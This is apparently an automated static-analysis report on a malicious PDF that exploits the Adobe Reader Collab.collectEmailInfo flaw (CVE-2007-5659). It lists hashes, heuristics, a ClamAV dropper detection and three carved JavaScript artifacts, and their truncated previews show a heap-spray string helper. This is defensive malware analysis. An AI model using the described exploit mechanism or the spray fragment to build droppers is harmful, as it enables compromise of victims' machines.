Malicious PDF — malware analysis report

Static analysis result for SHA-256 6c3931a96dac5c05…

MALICIOUS

PDF

Size: 102.7 KB  Created: 2008-03-03 17:06:20 +08:00  Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 6.0.1 (Windows))
MD5: c6ce2c2b6d214af0164d0de7aaa653c2
SHA-1: 64420cdf3e920f5b51d303c5012d7dbc743d592a
SHA-256: 6c3931a96dac5c0560977c90fce766b2c2dd0110b04f68a76ad5a6d5078d5373
Risk Score: 348

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript that exploits CVE-2007-5659 (the Collab.collectEmailInfo buffer overflow in Adobe Reader) and uses unescape() to obfuscate its payload. The critical heuristics indicate a JavaScript exploit cluster, and ClamAV detected the file as a dropper. The embedded JavaScript is designed to download and execute a secondary payload, which is characteristic of dropper malware.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9999

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [critical] [CVE exact] CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • ClamAV: Win.Trojan.Dropper-82 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Dropper-82.
  • JavaScript action [low] [2 related findings] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical] PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file [low] PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
  • XFA form [low] PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic.
  • Object number defined twice with different bodies [info] PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/xhtml — In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/ — In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In PDF document text
    • http://ns.adobe.com/pdf/1.3/ — In PDF document text
    • http://ns.adobe.com/xap/1.0/ — In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/ — In PDF document text
    • http://purl.org/dc/elements/1.1/ — In PDF document text

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size

javascript_obj0033_000.js
SHA-256: a94ed7d0c010d078356a95fba1abc6601200b7b83eb811ee5f92813f20d13533
Kind: pdf-javascript-stream  Source: PDF /JS object 33 at offset 0x151A  Size: 85 bytes
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return
javascript_obj0035_001.js
SHA-256: 03574e1d20835705dbdbe0505985a8472366bec2262ccb79f03184e327e7082a
Kind: pdf-javascript-stream  Source: PDF /JS object 35 at offset 0x18527  Size: 5283 bytes
Detection
ClamAV: Win.Trojan.Dropper-82
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
... (truncated)
combined_document_js_000.js
SHA-256: 4181580af7a86bc508435de8b69342bea1fd497ec610939447a02c235508ed3b
Kind: deobfuscated-js  Source: combined document JavaScript streams at offset 0x151A  Size: 5369 bytes
Detection
ClamAV: Win.Trojan.Dropper-82
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return 

function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
... (truncated)